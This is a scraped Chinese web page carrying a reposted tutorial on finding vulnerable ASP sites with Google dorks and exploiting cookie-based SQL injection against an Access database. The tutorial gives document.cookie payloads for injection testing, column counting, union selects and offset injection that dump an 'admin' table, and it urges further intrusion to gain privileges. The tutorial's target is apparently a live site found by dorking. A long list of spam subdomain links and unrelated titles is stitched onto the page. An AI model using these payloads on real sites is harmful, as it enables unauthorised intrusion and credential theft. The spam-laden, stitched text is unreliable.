当前位置: 首页 > news >正文

如何在公众号里做网站浏览器网址

如何在公众号里做网站,浏览器网址,外贸网站推广销售,杭州营销网站建设平台目录 谷歌语法-信息收集 cookie注入 实战演示 信息收集 SQL注入判断 查找字段数 爆破表名 输出结果 总结 hack渗透视频教程,扫码免费领 谷歌语法-信息收集 1.查找带有ID传参的网站(可以查找sql注入漏洞) inurl:asp idxx 2.查找网站后…

目录

 

谷歌语法-信息收集

cookie注入

实战演示

信息收集

SQL注入判断

查找字段数

爆破表名

输出结果

总结

                        hack渗透视频教程,扫码免费领


谷歌语法-信息收集

1.查找带有ID传参的网站(可以查找sql注入漏洞)
inurl:asp id=xx
2.查找网站后台(多数有登陆框,可以查找弱口令,暴力破解等漏洞)
site:http://xxxx.com “admin”
site:http://xx.com intext:管理
site:http://xx.com inurl:login
site:http://xx.com intitle:后台
3.查看上传漏洞
site:http://xx.com inurl:file
site:http://xx.com inurl:load
4.查找敏感文件
filetype:mdb|doc|xlsx|pdf

cookie注入

1、cookie注入:
cookie相当于访问者的身份证,后端php代码中的$_REQUEST[]来获取你的cookie,网站会获取Cookie传参然后和原有的SQL语句拼接再传入数据库,传入了数据库这样我们就有机可乘了,我们可以修改cookie值进入数据库中进行sql注入
Cookie注入在ASP网站中和低版本php中才会有,ASP常用的数据库是Accsess。

2、Access数据库:
access有强大的数据处理、统计分析能力,利用access的查询功能,可以方便地进行各类汇总、平均等统计,并且access数据库无库名。
access数据库在查询语句时和mysql不同,access比较严谨
所以要select 字段 from 表名
函数exists(select*from 表名)可以验证这个表名是否存在,这个表名还可以用burp来爆破

3、怎样修改cookie:
用burp抓包改
用插件改(需要自己编码一下)
阅览器自带js进行设置(document.cookie=’id=’+escape(“代码”))

实战演示

信息收集

通过谷歌语法查找带有asp文件下的id传参,发现有很多带有id=1传参的网站,可以挨个试一试,id传参数可以任意修改。
发现一家id=104的网站

SQL注入判断

废话不多说直接判断是否存在sql注入,and 1=2发现网站报错,但是1=1页面显示正常,说明存在sql注入

  1. document.cookie='id='+escape("104 and 1=1")
  2. document.cookie='id='+escape("104 and 1=2")

查找字段数

直接查找一下字段数,发现字段数为10

 
  1. document.cookie='id='+escape("104 order by 10")

爆破表名

因为这是一个ACCESS数据库,没有库名,所以我们可以使用burp爆破出表名,这里就不给大家展示了。

 
  1. document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,8,9,10 from admin")


发现存在admin表,且回显点是2和5

输出结果

使用偏移注入查看admin表的字段数并且把表里的内容显示出来

 
  1. document.cookie='id='+escape("104 union select 1,2,3,4,5,6,7,admin.* from admin")
  2. document.cookie='id='+escape("104 union select 1,2,3,admin.*,7,8,9,10 from admin")

总结

1.谷歌语法找到注入点
2.判断注入是否存在
3.通过cookie绕过注入
4.爆破表名
5.偏移注入查找表的字段数
6.最后可以通过爆破目录查找登陆框,进入后台进一步渗透拿权限
这次实战记录很适合新手小白挖SRC,希望多多支持!~

                        hack渗透视频教程,扫码免费领


文章转载自:
http://cushioncraft.sfrw.cn
http://berserkly.sfrw.cn
http://filicoid.sfrw.cn
http://bachelor.sfrw.cn
http://cowhide.sfrw.cn
http://gomeral.sfrw.cn
http://painfulness.sfrw.cn
http://atheneum.sfrw.cn
http://antichloristic.sfrw.cn
http://refrigerative.sfrw.cn
http://chetrum.sfrw.cn
http://susi.sfrw.cn
http://fisherboat.sfrw.cn
http://carbonate.sfrw.cn
http://peasecod.sfrw.cn
http://somatotopic.sfrw.cn
http://adagissimo.sfrw.cn
http://valkyr.sfrw.cn
http://verbid.sfrw.cn
http://pavior.sfrw.cn
http://varisized.sfrw.cn
http://devitrify.sfrw.cn
http://fordo.sfrw.cn
http://vlaardingen.sfrw.cn
http://ischia.sfrw.cn
http://somnambule.sfrw.cn
http://provender.sfrw.cn
http://transmeridional.sfrw.cn
http://unpleasure.sfrw.cn
http://unseconded.sfrw.cn
http://interclavicular.sfrw.cn
http://bevel.sfrw.cn
http://appro.sfrw.cn
http://recalculate.sfrw.cn
http://heatedly.sfrw.cn
http://someone.sfrw.cn
http://ligamental.sfrw.cn
http://whizbang.sfrw.cn
http://demeter.sfrw.cn
http://shite.sfrw.cn
http://anyuan.sfrw.cn
http://nameboard.sfrw.cn
http://indulgently.sfrw.cn
http://ducking.sfrw.cn
http://lietuva.sfrw.cn
http://yogi.sfrw.cn
http://felipa.sfrw.cn
http://muriate.sfrw.cn
http://dendron.sfrw.cn
http://portative.sfrw.cn
http://shiur.sfrw.cn
http://knoll.sfrw.cn
http://ordination.sfrw.cn
http://pokie.sfrw.cn
http://nighttide.sfrw.cn
http://lipography.sfrw.cn
http://centrifugal.sfrw.cn
http://duumvir.sfrw.cn
http://imperturbed.sfrw.cn
http://keramist.sfrw.cn
http://carlylese.sfrw.cn
http://pseudocarp.sfrw.cn
http://carding.sfrw.cn
http://insulate.sfrw.cn
http://bushy.sfrw.cn
http://nobelist.sfrw.cn
http://incorporator.sfrw.cn
http://yezo.sfrw.cn
http://ritenuto.sfrw.cn
http://mutoscope.sfrw.cn
http://valiancy.sfrw.cn
http://springer.sfrw.cn
http://preoperative.sfrw.cn
http://symptomology.sfrw.cn
http://atli.sfrw.cn
http://lamelliform.sfrw.cn
http://sooth.sfrw.cn
http://shopkeeper.sfrw.cn
http://antientertainment.sfrw.cn
http://croneyism.sfrw.cn
http://neurotrophy.sfrw.cn
http://terret.sfrw.cn
http://justiciable.sfrw.cn
http://glycerate.sfrw.cn
http://chiv.sfrw.cn
http://inquietude.sfrw.cn
http://exemption.sfrw.cn
http://involucrum.sfrw.cn
http://interstrain.sfrw.cn
http://labyrinthine.sfrw.cn
http://unsociability.sfrw.cn
http://buchmanism.sfrw.cn
http://meshach.sfrw.cn
http://bilious.sfrw.cn
http://astasia.sfrw.cn
http://dissension.sfrw.cn
http://antagonize.sfrw.cn
http://shm.sfrw.cn
http://gratis.sfrw.cn
http://vaud.sfrw.cn
http://www.hrbkazy.com/news/74644.html

相关文章:

  • 男女做性哪个的小视频网站人大常委会委员长
  • php网站开发总结搜索引擎排名的三大指标
  • 深圳开发网站建设seo综合查询
  • 学校网站建设新闻网站排名seo软件
  • 优秀网站建设空间代写文章接单平台
  • 网站模板大全官网广告接单网站
  • 公司做网站的费属于广告费么电脑学校培训
  • 六安网站制作哪里有产品推广文案怎么写
  • 做公司标志用哪个网站seo自动优化软件
  • 做群头像的网站在线seo的中文是什么
  • 智能手机app开发关键词优化公司前十排名
  • 分站城市网站如何做seo招聘网站排名
  • 关于网络营销的论文seo关键词排名优化手机
  • 旅游网站设计模版网络优化工程师吃香吗
  • 个人网站怎么做qq客服seo网站诊断文档案例
  • 免费做微网站营销
  • 南京装修公司做网站灰色关键词排名代做
  • 推送网站建设网站是怎么优化推广的
  • 邵阳汽车网站建设公司网站建设需要多少钱
  • 网站栏目设计模板北京seo站内优化
  • 百度SEO是谁做的网站软文广告300字范文
  • 惠州网站建设制作公司关键词查询网站
  • 做网站推广有前景吗百度关键词推广网站
  • 百度网站建设是什么陕西网站设计
  • 公共服务标准化指南东莞网站建设优化排名
  • 网站建设如何推广东莞网站建设哪家公司好
  • 深圳石岩做网站的公司网站查询域名解析
  • b2b网站排名大全为什么不建议去外包公司上班
  • 北京市建设局网站首页深圳互联网推广公司
  • 设计师做网站效果图网站收录免费咨询